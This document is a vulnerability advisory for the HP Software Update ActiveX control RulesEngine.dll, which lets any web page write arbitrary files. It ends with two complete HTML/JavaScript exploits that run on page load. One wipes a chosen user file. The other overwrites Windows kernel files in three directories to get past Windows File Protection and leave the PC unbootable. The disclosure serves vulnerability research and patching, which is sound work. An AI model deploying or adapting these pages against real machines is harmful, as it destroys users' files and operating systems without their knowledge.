
HP laptops Software Update tool vulnerability



Advisory:
/////////

There is another remotely exploitable flaw in software preinstalled on HP 
notebooks. This time the culprit is the automatic software update tool 
provided by the vendor. Exploitation may destroy the contents of user files or 
corrupt vital system files (e.g. the kernel), leaving the PC unbootable.



Overview:
/////////

The flaw is located in the software called HP Software Update, shipped with HP 
notebooks to provide automatic software updates and patching of critical 
vulnerabilities. One of the ActiveX controls deployed by default by the vendor 
exposes an insecure method that gives a remote attacker arbitrary file write 
access on the victim's system.



Impact:
///////

Remote corruption of user file contents
Remote damage to system kernel files / Operating System DoS condition




Attack vectors:
///////////////

There are two main attack vector schemes:

- inducing the remote user to open a WWW link after obtaining the location(s) 
and name(s) of arbitrary file(s) on the remote system. After the link is 
clicked the contents of those files are unrecoverably destroyed. This attack 
vector therefore requires additional social engineering of the victim to 
acquire the exact names and locations of the target files.

- inducing the remote user to open a WWW link that corrupts vital Operating 
System files, leaving the system unusable. This attack vector DOESN'T require 
any additional social engineering of the victim, because the system files are 
always placed in predictable locations.






Technical details:
//////////////////

The vulnerable ActiveX control RulesEngine.dll is a component of the HP 
Software Update system designed by the vendor.

It has the CLSID 7CB9D4F5-C492-42A4-93B1-3F7D6946470D and is by default 
registered in the "Safe for Scripting" OLE component category, which allows 
any web page rendered by the browser full scripting access to the control's 
methods.

The default control installation path is 
C:\Program Files\Hewlett-Packard\eSupportDiags\RulesEngine.dll

The control is used by the HP Software Update client application HPWUCli.exe 
to enumerate, load and store information about available software patches. 
The HPWUCli.exe binary is located in the directory:
C:\Program Files\HP\HP Software Update\

The control may also be used by a remote WWW service, such as Hewlett-Packard 
online software update service.

The potentially insecure method is:
void SaveToFile(String dataFilePath);

This method stores the patch-specific data (version, remote location, vendor 
name, software description) in a binary file that begins with a 32-bit integer 
holding the number of patches stored in the data file.

The problem is that the control does not distinguish between its own local 
data area and the rest of the file system. Both the LoadDataFromFile() and 
SaveToFile() methods have access to the entire file system, so any arbitrary 
user file can be accessed remotely through either of them.
SaveToFile() can be exploited to store an empty, freshly initialized patch 
data set into an existing file, which destroys the previous contents and 
resets the file to 4 zero bytes, i.e. a header with a patch count of zero.

Given where this vulnerability sits (the vendor's own software update system), 
simply disabling the vulnerable control through a vendor patch (as was done in 
the other HP software vulnerability case, HP Info Center) would cripple the 
machine's software update system and leave the user exposed to future security 
issues.

Therefore a reimplementation of the update system and/or of the control's 
local data area handling is strongly recommended.





Remote Kernel Wreckage Exploit
//////////////////////////////

Using this flaw one can construct an armed exploit able, for example, to 
destroy the remote system's kernel files and make the machine UNBOOTABLE. The 
exploit uses the vulnerable SaveToFile() to overwrite the NT kernel files with 
4 zero bytes. The targets are the memory-mapped ntoskrnl.exe and ntkrnlpa.exe 
kernel files, which have no write lock set on them and may be opened for 
writing. Although Windows NT contains a protection against this kind of 
activity (system file overwrite, Windows File Protection), it can be fooled by 
overwriting the kernel files in three places at once: the system binary backup 
directory (\System32\DllCache\), the live system directory (\System32\) and 
the Driver Cache directory (\Windows\Driver Cache\).

When executed it stores zero-initialized patch information via the 
SaveToFile() method sequentially into the NT kernel files ntoskrnl.exe, 
ntkrnlpa.exe, ntkrnlmp.exe and ntkrpamp.exe, first in the System32\DllCache\ 
directory, then in \System32\ and finally in Windows\Driver Cache\. After the 
very next OS shutdown the machine will not boot anymore.

The exploit code has been attached to the end of this advisory. NOTE however 
that it is provided ONLY as a Proof of Concept code and has been released ONLY 
to estimate the impact level of the issue.





Vulnerable Software:
////////////////////

HP Software Update client v3.0.8.4
RulesEngine.dll ActiveX CTL v1.0

Internet Explorer 6.0  
Internet Explorer 7.0  
 

Windows XP Home
Windows XP Pro
Windows 2000
Windows 2003
Windows Vista





Vulnerable Hardware
///////////////////

Every HP notebook containing the HP Software Update application is vulnerable. 
The list of affected models disclosed by the vendor in confirmation of the 
previous HP laptop issue (the "HP Info Center" case) is likely to be similar in 
this case.






Exploits:
/////////


//////////////////////////////////////////
//Remote Arbitrary File Corruption Exploit
//////////////////////////////////////////

<html>
<head>
<script language="JavaScript">


var filePath="c:\\temp\\testfile.txt";

function spawn3()
{
        o2obj.SaveToFile(filePath);
}

</script>
</head>

<body onload="spawn3()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
   classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D">
</object>
</body>
</html>









////////////////////////////////
//Remote Kernel Wreckage Exploit
////////////////////////////////
//
//        
//  WARNING! THE REAL THING...
//  DON'T TRY THIS AT HOME!
//  THIS WILL DAMAGE YOUR 
//  HP COMPUTER SYSTEM!!!
//
//
////////////////////////////////



<html>
<head>
<script language="JavaScript">

function spawn3()
{

        o2obj.EvaluateRules();

        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntoskrnl.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlpa.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrnlmp.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\dllcache\\ntkrpamp.exe");

        o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntoskrnl.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\system32\\ntkrnlpa.exe");

        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntoskrnl.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlpa.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrnlmp.exe");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\ntkrpamp.exe");

        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\sp2.cab");
        o2obj.SaveToFile("c:\\WINDOWS\\Driver Cache\\i386\\driver.cab");
}


function meltdown()
{
        spawn3();
        spawn3();
        spawn3();
}

</script>
</head>

<body onload="meltdown()">
<object ID="o2obj" WIDTH=0 HEIGHT=0
   classid="clsid:7CB9D4F5-C492-42A4-93B1-3F7D6946470D">
</object>
</body>
</html>







Related final word:
///////////////////

Spiderpig, spiderpig, does whatever the spiderpig does...
;-)







Links:
//////

Original advisory link:
www.anspi.pl/~porkythepig/hp-issue/wyfukanyszynszyl.txt





Credits:
////////

Issue discovery and research: porkythepig
Contact: porkythepig@xxxxxxxx